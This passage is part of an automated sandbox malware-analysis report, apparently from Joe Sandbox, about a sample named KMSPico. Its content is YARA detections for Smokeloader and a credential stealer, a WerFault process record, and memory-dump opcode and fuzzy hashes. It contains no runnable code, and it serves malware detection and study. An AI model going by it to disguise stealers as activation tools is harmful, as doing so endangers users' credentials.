                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:01:48:03
                                    Start date:29/02/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
                                    Imagebase:0xea0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Non-executed Functions

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4507f270a2ee7dabfb465380396a5c221c8a3b694f4f23394a55b24be7c05c73
                                    • Instruction ID: 8d936e00bf124ba3a4402160f0f99ee23ab4cacd710cd64892e45eae027af7da
                                    • Opcode Fuzzy Hash: 4507f270a2ee7dabfb465380396a5c221c8a3b694f4f23394a55b24be7c05c73
                                    • Instruction Fuzzy Hash: 1CE165A645E7C19FE7139B7498652803FB4AE17224B0F46DBC0C1CF4F3E218590ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15d704726d580b4dd7883564c2eb591c1b9004fcc4c7c31cb6fdcdd1d5ec80a2
                                    • Instruction ID: 99de8d58d2a8e1c85be8f15777443db1a134925b6494b2226670f4679cf3a0fe
                                    • Opcode Fuzzy Hash: 15d704726d580b4dd7883564c2eb591c1b9004fcc4c7c31cb6fdcdd1d5ec80a2
                                    • Instruction Fuzzy Hash: 56E164A645EBC19FE7139B7488656803FB0AE17224B5F46DBC0C1CF4F3E218590ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c3d0e7c582979b76f6187cab7793e723a7934567e9e692c1b4fde7a82fc3e96
                                    • Instruction ID: fa7b742345bc77aa2c8c94a88b781d4cfbf87a59e0a0ad6f45556a13c4647a14
                                    • Opcode Fuzzy Hash: 4c3d0e7c582979b76f6187cab7793e723a7934567e9e692c1b4fde7a82fc3e96
                                    • Instruction Fuzzy Hash: 167153A645E7C15FE7139B748C616803FB0AE17224B4F46DBD091CF4F3E218A90ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%